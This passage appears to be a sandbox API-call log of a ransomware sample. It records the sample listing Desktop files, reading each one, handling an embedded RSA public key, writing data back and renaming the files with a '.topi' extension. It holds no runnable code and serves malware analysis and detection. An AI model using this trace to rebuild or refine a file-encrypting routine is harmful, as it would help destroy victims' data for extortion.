1 [0094.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.607] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0x69a3, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x69a3, lpOverlapped=0x0) returned 1 [0094.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.607] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x69a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.607] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.607] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.607] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.608] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.608] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.608] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.608] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.608] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.608] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.608] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.608] CloseHandle (hObject=0x6a8) returned 1 [0094.609] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.609] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0094.609] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.609] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pOX7h1T6RlrYuJGtjF_U.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pox7h1t6rlryujgtjf_u.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pOX7h1T6RlrYuJGtjF_U.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pox7h1t6rlryujgtjf_u.png.topi")) returned 1 [0094.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.610] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.611] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a4282a0, ftCreationTime.dwHighDateTime=0x1d5be33, ftLastAccessTime.dwLowDateTime=0x3c2a49b0, ftLastAccessTime.dwHighDateTime=0x1d5c062, ftLastWriteTime.dwLowDateTime=0x3c2a49b0, ftLastWriteTime.dwHighDateTime=0x1d5c062, nFileSizeHigh=0x0, nFileSizeLow=0x9377, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QdJt Sw.wav", cAlternateFileName="QDJTSW~1.WAV")) returned 1 [0094.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.611] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QdJt Sw.wav") returned=".wav" [0094.611] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QdJt Sw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qdjt sw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.611] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=37751) returned 1 [0094.611] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.614] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x9351, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.614] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.615] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.615] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.615] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.615] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x9377, lpOverlapped=0x0) returned 1 [0094.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.616] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.616] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.617] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.617] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.617] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.617] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.617] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.617] GetLastError () returned 0x0 [0094.617] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.617] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.617] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.617] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.617] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.617] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.617] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.617] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.617] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.617] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9380) returned 0x99f52d8 [0094.617] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.617] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3cd0 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90d8 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3d18 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90f0 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9120 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9138 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.618] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.618] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9120 | out: hHeap=0x680000) returned 1 [0094.618] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9138 | out: hHeap=0x680000) returned 1 [0094.618] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.618] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.618] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9138 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9120 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9138 | out: hHeap=0x680000) returned 1 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9120 | out: hHeap=0x680000) returned 1 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.619] GetCurrentThreadId () returned 0x8c4 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1dc0 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.619] GetCurrentThreadId () returned 0x8c4 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9120 [0094.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9138 [0094.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9108 [0094.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.621] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QdJt Sw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qdjt sw.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QdJt Sw.wav.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qdjt sw.wav.topi")) returned 1 [0094.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.621] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.622] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fb10, ftCreationTime.dwHighDateTime=0x1d5ba97, ftLastAccessTime.dwLowDateTime=0x2dc8e720, ftLastAccessTime.dwHighDateTime=0x1d5c470, ftLastWriteTime.dwLowDateTime=0x2dc8e720, ftLastWriteTime.dwHighDateTime=0x1d5c470, nFileSizeHigh=0x0, nFileSizeLow=0x9816, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="quat5yQtAQx60X5AadT.mp4", cAlternateFileName="QUAT5Y~1.MP4")) returned 1 [0094.623] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\quat5yQtAQx60X5AadT.mp4") returned=".mp4" [0094.623] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\quat5yQtAQx60X5AadT.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\quat5yqtaqx60x5aadt.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.623] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=38934) returned 1 [0094.623] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.625] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x97f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.625] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.627] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.627] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.627] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.627] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.627] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.627] GetLastError () returned 0x0 [0094.628] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.628] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.628] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.628] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.628] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9820) returned 0x99f52d8 [0094.628] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.628] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.628] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.628] RtlAllocateHeap 